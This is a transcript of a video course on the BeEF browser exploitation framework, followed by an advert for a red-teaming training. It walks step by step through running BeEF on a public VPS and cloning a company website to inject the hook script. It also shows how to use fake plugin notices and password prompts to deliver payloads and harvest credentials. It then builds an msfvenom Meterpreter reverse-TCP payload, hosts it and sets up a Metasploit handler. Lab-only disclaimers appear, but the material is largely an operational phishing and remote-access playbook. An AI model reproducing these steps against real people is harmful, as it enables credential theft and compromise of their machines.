Let me tell you one thing, guys. If you don't have any knowledge about beef framework, then this training is for you. Or if you have a knowledge about beef but you don't know how to use it, still you can able to watch it. Or if you don't have any knowledge about ethical hacking, still you can able to watch it. Okay, it's not a big deal about this framework. It is a one of the easiest framework anyone can able to learn this one. Okay, the thing is, let me tell you, this is a one of the important thing. The attacks which we did in this course, it's complete local attacks. Okay, we didn't damage any PC here, we didn't exploited anything. Simple, we just set up our own machines and we perform the attacks here. Okay, so always remember, don't test anything without permission. Okay, if you have a permission, then you can go with it. Okay, if you don't have permission, then don't do it. Okay, and also just try to watch the training in 1.5 or 2x. okay, because due to my slang or something like that, you will get a lot of issues. Okay, so that's why just try to watch it in 1.5x, right? And also it's one of the most important notice here, we are using Kali latest version 2024.2. okay, so try to download it. And also I will be covered from where we downloaded it. Again, I am saying here we are using the latest version, right? Hope you guys enjoy this class. Thank you, have a nice day. So here is the thing, to set up Kali Linux, first of all we need to download it. We can able to download it from where? Kali.org. simple, just visit this site and also download the VMware workstation. To download VMware workstation, simple search for VMware workstation, download, and here you can able to see it. Simple, what you need to do, go down, and here there is a try workstation 17 player pro player for Windows. Simple, you are using Windows, then you need to download for Windows. If you are using Linux, then you no need to do this process. Okay, now here the thing is, just download the setup file here and install it. It's a basically setup file which is around 600 MB. next, and install it. After installing it, you guys will see like this on your desktop. Okay, here you can able to see. Now let's download the Kali Linux. To download Kali sorry guys, to download Kali Linux, first of all the thing is, click on download. Here there is a virtual machines, click here and download this one, VMware 64 for VMware. Okay, which is 64-bit. If you are using VirtualBox, then you need to go for it, Kimo, Hyper-V. If you are using any, simple, go with it. Okay, now here I already downloaded that one and also I extracted it. Here you guys can able to see. Okay, now here there is a Kali Linux 2024.2 is there. The file size is basically, the zip file size, it size is 3 GB. It's around 3.2 GB. after extracting it, here is our file which is around 13 GB. just open it, and what you need to do is click on view here and check file name extension, and here you can able to see the VMX file. Double click it, it will automatically open in VMware workstation here. Okay, see, it's automatically open in where? VMware workstation. Go to edit virtual machines. If you want to change anything, assume that if you want to change the memory size, what is a memory here? It's a RAM. Simple, change it to 4 or something like that. And here there is a processor, it's by default, it's 4. Okay, see, let me tell you, it's gonna detect automatically according to your PC. This is also one of the excellent thing. And go to network adapter, just change it to NAT here. Sometimes it might be bridge or something like that, custom, just change it to not in my just let me close it and power on this virtual machine. Simple, click here. Okay, just type enter here, click on enter. So here is our Kali machine. Just type Kali, user and password is what, Kali here. Now the thing is, you need to install a beef. Basically in this class we are learning how we can able to set up the beef in local network. Okay, basically this attack only for local network, the victims who are in your network. Okay, assume that is there any machines in your network, like which is connected with the Wi-Fi network, your Wi-Fi or those Wi-Fi which you are connected with. Okay, this is the thing here. And the thing is, in next class I'm gonna teach you how to set up for out of network as well. Okay, so see, in next class what will happen means you guys will see how we can able to set up in VPS. At that time what will happen means the attack will work both in local and out of network as well. Right now, here first of all the thing is you need to update the machine. To update machine, what we need to do, first of all open the terminal here. Let me zoom it. Just type apt get update. You need to run it as a sudo here. So it's gonna update it. So here we successfully updated it. Now what you need to do, you need to install the beef. To install beef, simple close this one and open a terminal as root. Here you can able to see the terminal, and just open a root terminal. Emulator is there, right? Simple click on that one and type the password, your Kali password. Zoom it. Let me zoom it for you so you can able to see it. Now simple just type here sudo apt install beef-xss. Okay, now it gonna install beef for you. What happened here, see, we need to install the dependencies first. This or this much dependencies are there if you want to run the beef. Now simple, let me install it. In VPS you will see some different process. In VPS you it won't ask for that one. Okay, done. Now what you need to do, after installing the beef, you need to edit the password here. You need to change the beef password. Basically by default password is beef here. Let me show you. Just type nano /etc/ beef. Just see beef is there, beef -xss. Then just change the config.yaml file. Okay, now go down. See, there is a user password here. Okay, now change the password. Okay, just add any password here, it doesn't matter. Okay, just use it, but you need to use a strong password. Assume that if you are starting this beef on your any machine, local or on VPS, then you need to use a good password here. In my case, let me use a normal one, such as any 123 cap with a capital A and control X to save it. And just type save buffer, modified buffer Y, and type enter. That's it. Now you need to run the beef. How to run a beef here? You need to start the service here. Let me clear this. To start service, just type sudo service beef-xss. Then simple, just type here start. Then what will happen? It's gonna start the beef service here. Now you need to check the status. Status is very important. Like from here you can able to see that it's active or not. Sometimes what will happen, you need to check. Okay, double check. We say it as a double check, right? Sometimes it won't active. Okay, at that time you need to change some configurations here. That's it. Let me clear it. Now how to access a beef here? Simple, you need to visit, just open your browser, just go to localhost. Okay, see, the beef will run on port 3000. Let me show you. If I type here nmap localhost. See, it's run on port 3000. So just add column there, 3000 localhost 3000. Okay, so this is a Apache 2 test page. Just add forward slash here and just type UI forward slash panel. From here you guys can able to see the beef panel. Okay, what is the username here? It's a beef, and the password is any123 which you just set up there. So it successfully, we can able to log in beef. From here you can, the attacker can able to control the targets. Okay, this is the thing. So there is an online browser. What is the online browser here? You will see in the next class. Here you will see the logs as well. To go to the logs here, see, user with IP has successfully authenticated in the application. And zombies are there. What is a zombies? Zombies are nothing but the compromised one. Okay, right. Hope you guys get it, how we can able to install the beef. In the next class you will see how we can able to install the beef on VPS as well. See, in the whole class what we are doing, we are using the local machine only. Okay, because YouTube doesn't have this kind of policy. Okay, like we can't able to use I can't able to show through VPS. Simple, I'm gonna show you how you can able to set up it. It's a very easy method, right? Hope you guys get it. So in this class I'm gonna teach you how you guys can able to set up beef for red team assessment. Now the thing is, here we're gonna use the VPS. okay, you can use any VPS. If you want to go with Amazon AWS one, then you can also go with it. Okay, assume that if you want to use any other service, then you can use it. If you want to use Ubuntu, you can also use it. It doesn't matter. Okay, if you want to use the Windows, you can also use the Windows. There is a lot of methods out there to install the beef on Windows. Okay, now basically mostly students are asking for to learn about beef. Okay, like how we can able to perform successful pen testing assessments, or sorry, red team assessments by using this beef. Okay, now the thing is here, beef play a very important role as a offensive as well, in offensive, in ethical hacking. It's offensive ethical hacking is same, but in ethical hacking what will happen means you will learn the concepts. Okay, but in offensive side it's mostly about the red teaming, right? So this is a thing, red teaming and plus pen testing as well. Now this is both, the beef framework play a very important role for both. Okay, for red teamers, for ethical hackers, for pen testers. Okay, now the thing is how to install the beef successfully so we can able to use this in out of network attacks. Now assume that I want to test my clients. Okay, there are having a kind of knowledge. Just take an example of phishing assessments. During phishing assessments what will happen, we send the phishing emails to our employees, right? That they have a kind of proper knowledge related to phishing or not, something like that. So here at that time, in this scenarios, the beef play very important role. Okay, so that's why I'm covering this one. Our intentions are not to hack anyone or something like that. So simple, the thing is to show you the real approach here, right? Here the thing is, first of all you need a VPS. okay, VPS plays a very important role in pen testing and red team assessment. You need VPS. okay, because to perform successful attack, these things are important. Now we have a VPS here. Okay, it's a Kali. I just booted here Kali. You can, as I told you, you can use AWS VPS as well. It doesn't matter. If you have a knowledge about AWS, then you can go for it. There is also a profit server is there, which is very excellent. You can also use that one. Okay, instead of using Kali, I just told you, you can also use a Ubuntu. Because mostly why I am saying again and again, people will ask. Okay, even I said the things, they ask. This is a thing. Okay, now first of all the thing is, you need to update your machine before installing. You need to update. How to update? Just type apt get update here. Simple, what will happen, it gonna update the packages for you. Okay, it's successfully done because I already updated this one. Okay, now you need to install the beef here. To install beef, you just need to type apt install beef -xss. Okay, just let me type it, sudo apt install beef hyphen, let me zoom it, okay, hyphen xss, or you can say it as a dash, mostly I say dash there. Okay, just type enter. Now what will happen, it's gonna install beef for you. In your case it will ask for y, okay, just type y there and install it, you guys will good to go. Now after installing the beef, there is a one thing which you need to remember. Just open the file manager here, you can also do it from the Chrome, it doesn't matter. Go to file system. See, in file system you will see a etc folder, just open that one. So in etc folder look for beef. You see there is a beef-xss is there, just open this one. See, there is a config .yaml file is here, open with mousepad. Always remember, you need to change the password here. The default password will be beef, okay? You need to change it to any 123 or anything, it doesn't matter. If you want to, you need to change the password, just add any strong password here, okay? Because this thing will expose on internet, okay? If somebody know your RDP IP, he can able to access the beef panel there. This is the thing, because we are installing the beef on VPS, so anyone can able to access it, even you, okay? Assume that after completing the training, I'm gonna have this VPS, okay? This is the thing, so that's why you can't able to access it. But the thing is, anyone can able to access it if they know the IP address and if they know about the beef port, something like that, they can able to access it, okay? You can also restrict the IP addresses here, okay? If you want to restrict, you can also restrict it, okay? So then click on file, click on save and close it, okay? After closing it, what you need to do, you need to start the beef server here. To start a beef server, what you need to do, simple, just type here sudo service beef-xss start. If you want to stop it, you can type stop there, just type start there, then what will happen, it successfully started. Now check the status, always remember after starting beef, check the status. If it is active, then it is good, okay? All right, I am doing it again, you no need to do it. Now simple, here how to access this one. Now basically once you start the beef server here, then what will happen means it will run on port 3000. Just type here nmap and scan your own IP address here, and here you guys can able to see it's running on 3000 port here, okay? So how to access it is from here, from the browser, from your VPS also you guys can able to access it. If you want to access from anywhere, assume that you have a client, you need to provide this beef there, okay? So he can able to use it. At that time simple, you just need to provide the URL, then he can able to access it, okay? It doesn't matter assume that it's not a local, okay? This is the thing, in local what will happen, you need to connect with the network, then only you can able to access it. In VPS what will happen, you can able to access it from anywhere. The important thing is it must and should run it, okay? The service must be running. This is the thing, I think what happened here, okay? No problem, let me access the beef here. So simple, just open your browser. See, I'm not this is my machine, okay? This machine is running in US, basically this VPS I think is from US, okay? Now this is in different country, this machine, this is my real machine. I just open the Chrome here. Now let's access it, okay? First of all, the thing is you need to type your VPS IP address, which is 94.156 let me see, 68198. This is my IP, okay? Now mention the port here. What is a port? I just told you it will by default be run on port 3000. you type hit, if you hit enter, this is how you guys can able to see it. Okay, now simple, just add the forward slash here, then add UI if you want to access a UI, and just add panel here. That means you are accessing the UI panel, right? Here you need to mention the username and password. What is a username here? It's a beef, and password is what here? It's a any, I think any 123. You can type anything, it doesn't matter. So from here you guys can able to see the things. Okay, see, there is a online browser. So assume that if anyone open your link, then what will happen? From here you guys can able to see it, and you can able to control that one. Okay, and there is a offline browser is there. That means now in this class we will see each and everything, like how to hook a browser here, right? So before doing this process, mostly you guys will get kind of confusion. How you know that port 3000 is running, and how it's hosted in UI panel? If we just navigate to UI panel, right? How I know that one? Simple, see here, just open the terminal here. Okay, let me show you. Not this one, go, always remember, go with root terminal here when you are using beef. Now start the service, beef service here. Sudo service beef. See here, you will see beef-xss start. Okay, it started. Now just start here dot forward slash, just type beef. Okay, sorry, -xss. Like this. Okay, yeah, mostly in older version what happened means you guys will go like that dot forward slash beef. How simple, instead of that you can also go with beef-xss. So here is our beef, automatically it's open. And also here you will see in a very clear manner, okay, this one hook, you need to send this URL to your victim. If we enter in that URL, then what will happen? You will get the connection there. Okay, simple, no execution here. And rats and botnets, what will happen means the victim must and should execute that one. Here there is no execution. Okay, and also you will see the panel link here, okay, which we just used in the last class. Okay, like a UI panel is there, right? So simple, this is how I got that. Okay, beef is running here. So directly I just visited to this panel. Okay, don't be confused here. Simple, if you execute this one, then here only you will see the panel. Assume that if you are doing in VPS, simply here you will see the VPS IP address. Okay, don't worry, don't be confused, things are very easy. Now here, as I told you, this is a hook. Now what will happen is the victim needs to, let me show you practically how it's work. First of all, let me log in here. What is a username? Username is beef, and password is any 123. Okay, and also if you go here, see, before being able to fully explore the framework, you will have to hook browser to begin. Can point, there is a basic demo page here. Okay, if you want to hook any page, if you are debugging, reason of course, drag the following bookmarks links into your browser bookmarks bar, then simple click on the shortcut on the another page, which is hook me. Okay, basically if you click on this one, then what will happen? It gonna hook the page here. See, basically this one, okay, which you are seeing in this line, let me zoom it. So this one basically, if I open this, then what will happen is this is a demo page. If your target visit this one, this URL, okay, assume that you send it this URL, then what will happen? It successfully hooked. Okay, if I go to here online browser, this is our target URL. Okay, Sorry, target browser. Okay, don't be confused here. This is the same Kali machine. Let me do it in Windows. Okay, let me open Chrome in Windows machine. See, this is a Windows. If I paste this URL here, then what will happen? Basically, it won't work because this is a loop IP. Let me see. Can I able to see the connection or not? Let me refresh it. No, I can't able to see it. Now, what you need to do is assume that if you are performing the attack, this testing on the local network at the time, just open the terminal here. Now, just type here ifconfig. Again, I am saying this is for the local attack, okay? If you are using VPS, then what will happen? It doesn't matter what you are doing. If you are doing local out of network, it doesn't matter. Because everywhere you need to use the VPS IP only, okay? Not like this confusion you will see there. Now simple, instead of this loopback IP, I'm gonna add the Kali IP here. Then see, it successfully hooked. Now if I go back to my Kali machine, here you will see the Windows machine as well. See, I got the Windows machine. Hope you guys can able to see it, okay? Now what is the main thing here? It's a logs, okay? Here you will see the logs. And here there is a commands, which is very dangerous, okay? Why? The simple thing is, from here the attacker can able to take the control on the victim system, okay? Now let me tell you in red team assessment what will happen. Means this is not you know about red teaming, right? So in red teaming, what we do means we have the permissions, first thing. And this beef play a very important role there, okay? Because assume that if you are doing the red teaming from internal network or doing from the out of network as well, at that time mostly this beef attacks, okay, are not detectable. You can't detect the beef attacks mostly, okay? Assume that if I want to avoid the beef attack, then what I need to do, I need to disable the JavaScript here, okay? If you disable the JavaScript, then what will happen? You can't see much results, okay? You can't see the, assume that if in my company, okay, assume that somebody is trying to access some blocks here, okay? At that time, assume that for security purpose, he just disabled the JavaScript, then he can't see that much results there, okay? This is the thing, like in a not a good proper manner, this is the thing, okay? Hope you guys get it. Now let me show you some methods, some techniques here. So here there is a social engineering. Social engineering plays a very important role. Assume that somebody want to steal any social media. At that time, what will happen? Simple, these guys will use this techniques here, okay? Now see, there is a fake notification bar is here. If I click on this one, here the attacker will add the direct URL of his payload. Okay, first of all, he gonna host the payload on the web server. This is a direct link, okay? What will happen if you execute this one? Then just let me show you practically. If I execute it, then what will happen is, see, it will show you like that, like this, okay? Additional plugins are required to display all the media on the page. If you click on the install missing plugins, then what will happen? The payload will get downloaded, and if you click it, then it will be hacked. Now let me show you here. The Windows Defender is enable, okay? Just wait. Windows security, virus and threat protection. See, it's enabled here. Hope you guys can able to see. So it is kind of very excellent attack, right? And in the next class, I'm gonna teach you how the attacker can able to hack the machines, okay? Like how he can able to take control on the machines as well. There is a lot, okay? If you explore it, you will see a lot of things. Hope you guys enjoy this class. Thank you. Have a nice day. Now in this class, we're gonna learn how we can able to set up the Metasploit as well, okay? To assume that this is a kind of social engineering technique. First of all, let me show you practically, okay? Then you will get it what we are doing here. So first of all, the thing is you need to start your Apache server, okay? Because here the server play a very important role, because we need to host our payload there, okay? Right, now let me do one thing. Let me generate the payload on desktop. To generate payload, what we do, just type msfnm dash p for the payload. I am generating a Windows payload /meterbiter. /reverse_tcp. Okay. So this we are generating this. And also just type here your lhost. Just type here lhost is equal your IP address. What is your Kali IP? This is our Kali IP. Simple. Paste it here. And the port which you want to listen on. Just type here L port. Let me use 4455 here, okay? Sorry, always remember add is equal 4455. Now just add the format dash f for the format and the exe. Now let me save the output as what, with the name of payload.exe. here attacker, what he will do means he's gonna generate some advanced payloads, okay? So let me tell you one real world examples. If you visit any movie downloading site, something like that, okay, at the time what will happen means if you click, mostly in Chrome, if you are using the Chrome browser, then what will happen means if you click on the download button, sometimes you will see in your PC automatically some exe files will get downloaded. Assume that if you are using Android, Android files will get downloaded, Android APKs. So this is the only reason, okay? This is also one reason the attackers will spread the viruses, right? So this is the thing. That is a little bit advanced process, but it's followed this method, this techniques as well, okay? Now here what will happen is a payload has been created. Now after creating a payload, see, this is a payload. Now what we need to do, just copy or cut it and do one thing. Just add it in var www.html. Just paste it here. Right. See, assume that if you are using cPanel or something like that, you need to add the payload there only. Okay, in cPanel. Just pay, upload it on the cPanel, because we need a direct URL. Okay, what is direct URL here? Let me show you. Now, if I type here my Kali IP, just assume that let me type my Kali IP here. Okay, here is my Kali. So this is my Kali IP, and if I Apache server service is running there, and /payload.exe, if I type something like that, if I type enter, see, the payload is automatically downloading here. Okay, basically this is known at known as what, direct URL, okay? All right, now after doing this process, what you need to do, go to, just select your machine, okay? In my case, just assume that the victim visited this machine, this what we say, and the IP address, which is this one. Just assume that the attacker sent it the IP or any domain, okay, like this. I just entered here. Now here you will see the connection. We got the connection. After getting the connection and red team assessment as well, to get initial access, mostly in red team assessment, what we do means we won't send this kind of malicious payloads, okay? Because it might damage the system as well. This is the thing. So let me tell you one important thing. Assume that if you are doing a red team assessment, just try to find the vulnerability on systems, or assume that in that company is there any kind of subdomains, okay, or any kind of IPs out there which are vulnerable. Try to enter through that one, okay? Right, okay. And the second reason is, assume that the company is saying that, okay, you can also use the malicious stuffs like docx is there, this kind of payload to get initial access. This comes under social engineering techniques. Okay, you can able to do that. Okay, this is also some kind of restrictions in companies. Okay, so you need to focus on each and everything. As I told you in the last classes as well, you will get a complete document from you guys can able to see it. Okay, which things you can able to use it. Now here we got the machine. Now here what we need to do, go in social engineering. Mostly this is, as I told you, this play a very important role. And see here, there is a fake notification bar is here. Okay, just click open this one. See here, the attacker will add some kind of legit text. Then here, okay, here what he do means he gonna add the direct link, okay, which is this one, which is this one. Okay, just copy it and paste it here. Then what will happen, just let me add HTTP as well. Just watch carefully, just wait. Now watch carefully what will happen if I execute it. Okay, just wait. Okay, it's executed. Now see what will happen. It will show you like this. If you click on install missing plugins, then what will happen, the payload. Okay, see here, the payload is being downloaded. Okay, why it's asking the location, because in Chrome I just set that one. Okay, whenever I download something, before downloading ask me, okay, where I need to save the file. So that's why it's asking, it's open the file manager. In mostly in cases what will happen, it will automatically get downloaded. Okay, this is the thing. Okay, hope you guys get it, how the attacker will send the get the connection here. Now how to listen the connection, simple, you know this all stuffs. Okay, if you watch our previous courses, you will get it. Now let me show you here only. Okay, just type here msf console. Assume that before doing this process, okay, before sending, before executing this thing, you need to the attacker or attacker or red teamer must and should listen on the connection. Okay, before executing, again I am saying, before executing it, what you need to do, you need to set the connection here. Okay, now just type here use exploit / multi handler handler, just type enter, then set payload. Mostly you guys are beginners, I assume that if you are a beginner, mostly here they do this, here you will get kind of confusion. To avoid this confusion, what you need to do means, in set payload, while you are generating the this MSF venom, right here you guys generated the MSF venom payload. See here, MSF venom -p is for what, it's an indication of payload. So simple, just copy this one, no confusion, nothing. Okay, just copy it and paste it here. That's it. Okay, you no need to worry about these things. Just type here set lhost, which lhost you just set. Okay, simple, go back again. Mostly beginners will get a kind of confusions here. Simple, here only, just see here only you just set the lhost, which is this one, just copy it. And what is lport? 4455, that's it. Okay, like this. Then set lport, what is the lport, we just set 4455, that's it, exploit. Then what will happen, you will get the connection. Assume that now the attacker, what he will do means, he click on the execute command. Here it will show the pop-up. If you click on the install and he just executed it, the attacker will get connection here. Okay, this is a process which will happen. I don't want to show you, okay, because I can't, right, due to this policy, something like that. So this is the thing, guys. This is how we can able to use a beef. Now beef is not like nmap, okay? Basically in nmap we need to learn each and everything about the tool, but here what you need to do is you need to explore it. That's it. If you want to become a kind of master in beef, mostly people want to become a masters in tools, okay? Simple, same like that. Then you need to explore it, okay? Just set up one lab, set up Windows, okay, in VM, then try it, okay? Because this tool is very important and which is very useful in red team assessments, right? So hope you guys enjoy this class. Thank you, have a nice day. Hello guys, now here the thing is, just see this link, okay? This is kind of, this is a demo link, okay? Now here, if you want to make this in a legit way, at the time we need to inject the beef code, okay, in website. Now there are two ways. First of all, in red team assessment, what we do, we go with cPanel and domain. We purchase a excellent domain with cPanel. Simple, we're gonna clone our company website, okay? Then in that company website we're gonna inject the beef code, right? Now here what will happen is we're gonna send that link, okay? We have the good domain there, which is look like company domain, like that. Simple, the if the victim click on it, okay, we are performing the red team assessment here. So here we have the connection in a simple words. So if you want to do like that, then in red team assessment you need to think like a black hat hacker here, okay? This is the thing. Now let me show you how it's gonna happen. But here we are doing each and everything locally. We are not damaging any PC here. We are not damaging, we are not attacking any real PC. Each and everything we are doing in our own lab, okay? Let me tell you this thing, okay? Now here, first of all, what we need to do, I just stopped the Apache server here. Let me do it again. Just ignore this one, stopping the Apache server, each and everything. Now here, if you execute dot forward slash, oh sorry, beef dash xss, here you guys will see there is a example and there is a script, okay? Hook is there, right? Just focus on any of this one, okay? Doesn't matter hook, example. What you need to do is here, just copy from here to here, and instead of IP you need to add your system IP here. What is our system IP? The VPS IP or something like that, okay? Where you are running the beef, right? Okay, now here where how this thing is useful, let me show you that. Now visit, just target any website, okay? In red team assessment I just told you we focus on the company domains here, okay? Company website. Now assume that this is our company site, okay? Now what we gonna do here, we won't do any cloning process, something like that. We won't code. Simple, here click on show page as, select web page complete. This is important, where you need to focus, web page complete. Assume that if you select any other like all files, web page HTML only, something like that, then what will happen, you will get a CSS issue there. Okay, this is the thing. So always remember, go with web page complete and save. Okay, after downloading it, here you guys can able to see it's with the folder. Now just rename this HTML file. See, home of Acunetics art is here. So simple, just rename it to what, index.html, okay? Right, now simple, now you need to do one thing, just cut it, go to file system, go to var, go to www.html and paste it here. Okay, I can't able to paste it here, so simple, let me open as root and let me paste it now, because for this we need a permission, okay? Now let me tell you one thing. Assume that if you are doing on domain, simple, you need to upload this in your cPanel, or go to what we say file manager and go to ht docs here, okay, or public dot underscore html. From there you need to paste it, okay. And also remember, you need to change it to index.html. This is very important. Assume that if you are not doing it, then it doesn't work, okay. It's not a good thing, okay. Assume that if you didn't rename it to index.html, then what will happen is, assume that this is your domain, okay. Then what is a page name? Assume that it is something .html. This is how you need to provide, okay. Assume that if you just change this something to index.html, then what will happen? Assume that if your target visited any domain, it will automatically show you that page, okay. This is the thing. So always remember, just change it to index.html. Assume that is there any kind of other index files are there, delete it, okay. This is very important. In Apache server, what will happen means, in var wwwhtml, here you will see some default html sites, simple delete it, okay. That's it. And here just open this index.html. Just first of all, let me open as root here, because we need root permission for this, okay. Open with mousepad and focus. You can paste this anywhere, but remember there is a script, is there, right? Script is starting from here and this is an ending tag. Simple, if you paste here the code, it's also work, okay. If you paste the code in head as well, here it will work. If you go down, if there is any kind of end tag is there, if you paste here, it will work. It doesn't matter. Always remember, you need to paste the code after the end tag, okay. Assume that if you don't know about end tag or something like that, remember one thing, there is a script is there, /script, that this is an end tag, okay. So after that, just type enter and go back to your the terminal. Here you will see hook page, okay. Just copy this one script, copy from here to here. Let me copy it again. Copy, go to mousepad and paste it here, right. Now here in IP, you need to add your VPS IP or your Kali IP. In our case, what is our Kali IP? If you go to our terminal, so I just type there ifconfig, something like that. Where is ifconfig? Okay, here, this is my IP. Let me copy it. Let's go back here and let me paste the IP there. That's it. Now save it. After saving it, close it. Now if you are using cPanel or something like that, you no need to start Apache server or something like that, but we are doing this process locally, so that's why we need to start the Apache server. So simple, just type here sudo service apache 2 start, okay. That's it. If you type enter here, then Apache server has been started. Check the status as well, because status are very important, okay. It's active, that means it's running, okay. Now what you need to do, simple, if anyone visit this site, okay, visit this IP or domain in your case, then what will happen means, the guy you can able to get the connection there, okay. First of all, let's see the panel. Control panel is there. Let me refresh it. Still I have the connection here, because the beef is open here. So let me do one thing, let me close this tab there. Let me refresh again. Let me refresh again, again, again. It will the IP will goes to offline, okay, this one, okay. Now it's offline, right. This is the thing. Assume that if your target close this one, then you won't able to control it, okay. This is the thing. Now see, if I go on this Kali IP, then what will happen here, we can able to see our fake page where we just inject the URL, okay. See, here I got the connection, okay. If I go to view page source here, here you will see the hook. See, here there is a hook. Now, how to do the social engineering here? Simple, you just need to change the, go to the hook.js file and you need to change it. Okay, this is the thing. Now here, from here you guys can able to control it. Okay, if I click here and go to commands are important, and here the main and important thing is social engineering. Okay, now here, from here you can able to execute each and anything. It doesn't matter, like clickjacking is there, spoof address bar, okay, text to voice is there, fake flash update is there, okay, Google phishing. If you click on here, then what will happen is here you will see a phishing page. Okay, that's it. And there is a lot, and also there is a phone gap is there, there is a alert, upload file, start recording audio. Here what will happen means if you click on the start recording audio, then it will record the audio there. Just wait, let me show you. Okay, it started. Here you will see the, where, stop recording. You will see the file here. Just wait. Okay, sorry, we need a phone gap API. We need to insert the API there. Sorry for that. Prompt user is there, persistence is there. Okay, if you click on persistence, then what will happen? See, insert the beef hook into phone gap index. Here what you need to do is you need a API of phone gaps. Okay, so it will only work with the iPhone. This model requires a phone gap API. Persist resume is there, list files is there. Okay, examine device file system, the modules required of for this we need a phone gap. Okay, sorry, this is a phone gap folder. Okay, if you go with the persistence, here it is. Okay, WordPress add administrator, confirm close tab, hijack open window. Okay, assume that sometimes what will happen, the victim will open the multiple tabs here. Okay, now here assume that if anyone close this one, then what will happen, you will lose the connection. If you go with it where it is hijack open window, then what will happen means it gonna hijack it. Okay, basically this is also one vulnerability. From here you can able to read it. There is a host is there, detect CPU, there is a lot. A Metasploit is there, browser auto, basically this is a module. Okay, which redirect user to auto plan, Chrome extensions, get all cookies, inject beef is there. What is this? Attempt to inject the beef hook on all the available tab. Okay, here what will happen means assume that if any, there is a multiple tabs are there, if you use this module, then what will happen, it gonna inject each and everything. Okay, now this is a kind of persistence. Assume that after closing each and every tab, what will happen means you will lose the connection. Okay, but this is gonna make your process like a good, okay, like a little bit, you will get the time there, right? There is a screenshot. Let me tell you one thing guys, this process will work only on Chrome. See, sometimes it won't even work, okay, because if the Chrome get updated, it is secure. Okay, Chrome is very secure, so sometimes it won't work. I didn't try this one. If you want to try it, try it. Mostly this beef is useful to inject the payload. Okay, like assume that here by doing some social engineering techniques, you guys will able to do one attack here. Simple, he will get the fake update notification. Simple, if you click on it, then it gonna download the this thing. Okay, if you know red teaming, like history attack, something like that, then you can do a lot of stuffs by using beef. Okay, now here there is a screenshot. If I am gonna execute it, then what will happen means it gonna take the screenshot. And also there is a browser. In browser, detect faucet reader is here. There is a lot which won't work. Finger, create prompt dialog. This is also one of the good one. Now here, if you want to add hi and execute, here you will see the prompt. Okay, where it is. Yeah, this is how it's gonna work. Now if you visit any kind of sites, okay, IPs or something like that, it will ask for what? Admin credentials, right? If you want, if you, okay, I can't able to edit it. Just type here password of your PC for security. Okay, it's offline. If I click execute here, then what will happen, miss? I get the pop-up password of your PC for security. If he type the password, then what will happen? You guys can able to get that. Now redirect browser is there. If you want to redirect your victim somewhere, okay, assume that if you want to redirect, mostly attacker what he do, he gonna redirect to where? The phishing sites, okay, a malicious websites, a malicious pages, something like that, right? So these attacks are very dangerous. Now if I let me go with the beef project only. If I execute it, then what will happen, miss? I'm gonna redirect to where? Beef, okay, just wait. See here, it's redirecting to beef, okay, beef site. Hope you guys get it what we did here, okay? So this is all about the beef, okay? You need to explore it. I can't show you each and everything because due to the policy, there is a lot of cool attacks out there, okay? Just let me tell you one thing, guys, in red team assessments, these things are very useful, okay? If this is a, this sections comes under social engineering, right? Okay, now let's move to this one as well, which is a Metasploit, how the attacker can able to inject the payload. Not this is a not a injection process here. What will happen, miss? You will see it. Just wait. If you want to learn more, then you can join our red teaming training. Here you will learn both penetration testing and red teaming, okay, and SOC analysis as well. We are updating a lot in it. So here you will get a lifetime access, 24/7 support. You will get a 24/7 support, and the thing is, this is a complete pre-recorded training. You will get a panel access from where you guys can able to access it, okay? You will get a it's a LMS platform, okay? You will get a lifetime lab access as well. Basically these are the downloadable labs, and also we're gonna teach you how to set up a labs as well, okay? Now basically training language is in English, and the training hours is 90+ hours. It's a complete hands-on practical training. This is a complete roadmap to become a successful red teamer. Here we covered each and everything. First we're gonna teach you a basic penetration testing, then we will move to Wi-Fi penetration testing, okay? Then red team training, introduction to tools and MITRE attacks. Now here you will learn about what is MITRE attacks and what are the tools, okay? Mostly this section is only about the tools, how to become a master in the tools, okay, which is useful to perform red teaming. Then we will go to active directory penetration testing for red teamers. Here in this section we only learn those topics which are necessary for the red teamers. Then we will move to penetration testing using Metasploit. Now here you will learn each and everything about Metasploit, okay? If you don't know about Metasploit, this is a complete tool which is useful to perform a penetration testing, okay? So here we covered each and everything about Metasploit, how to use it for penetration testing and for red teaming as well. Now then we will move to external and internal red team operations. Here you will learn about red team operations. It's also give you a complete idea about how to perform the red team operations in real world. Then we will move to complete hands-on real world red teaming and penetration testing. Basically this section is focused on OSCP pattern, okay? In OSCP there is a OSCP, right? Hope you guys get it. If you are learning about red teaming or pen testing, mostly you people know about OSCP. This is a one of the best exam, okay, and training. Basically this section focus on the OSCP. Here we go with the labs, okay? We covered about the proving grounds as well, okay? How basically the thing is, this section will give you a complete knowledge how we can able to how we can able to test in real world, okay? It's a complete black box pen testing, okay? We go with the labs here. Basically I just cover how we can able to exploit those labs, okay? Like these labs, okay, which we covered in this sections, will help you in the real world. Okay, mostly in real world you will see these things only. Okay, right now here you will go to blue team training for red teamers. Here in this training, student will learn how to perform SOC analysis. Okay, after completing this section, student will get a complete idea how blue teamers work and how they analyze the attacks. Okay, now then we will go with Windows malware development for red teamers. Still we didn't cover it, okay, because these topics are huge. We are updating it. As I told you, see, previously if you watch our previous trainings, there we just covered only till here only, okay, till internal and external red team operations. Now in 2024, what happened is we added these topics here. Okay, this is the thing. Time to time we're gonna update it. As we told you that this is a complete dynamic training, we're gonna update it. This is the thing. Now here you guys will see the topics which we are covering in penetration testing. Okay, then we will here there are the topics which we covered in Wi-Fi penetration testing training. Okay, we also go with Wi-Fi pineapple, okay, Raspberry Pi and Android device, how we can able to perform Wi-Fi penetration testing using different hardwares. Okay, then we will move to red team MITRE attacks. Here these are the just definitions. Okay, what is reconnaissance? From here you can able to read it if you don't know. What is initial access? What is execution? Here you will see each and everything. Okay, now here there are the deep dive topics which we are covering. So first of all, this is related to MITRE attacks. First we will move to reconnaissance. In reconnaissance you will learn this all stuffs: Amaz, Spider and Harvester, Recon NG, Multigo, Nikto, Showdown, Spider. Okay, then this is a resource development, then this is a initial access. Just give your time and read the topics. Here we covered each and everything, okay, which is necessary, right? And also there is a donut resistance impact is there. Okay, in persistence, in persistence section we covered about impact. Basically by using impact in impact, what will happen means there are different tools are there. We're gonna use those scripts, okay, in a simple words, to perform persistence. Okay, so we are learning a lot here. Now then this is a privilege escalation part. Sharp up is there, and here we will see about the defense evasion. There is a lot. Okay, basically from here to here, here we are only covering about the MITRE attack till 14. Now there is a active directory penetration testing for red teamers. Here you will learn this all topics in the section. Then we will move to Metasploit for red teamers. Okay, in Metasploit section we gonna cover from here to here, okay, till 43 topic. Then we will move to red team analysis training, how to approach in real world. Here we gonna cover almost 15 topics. Now then we will move to master in active directory. Now here in this section you will learn each and everything about active directory penetration testing. 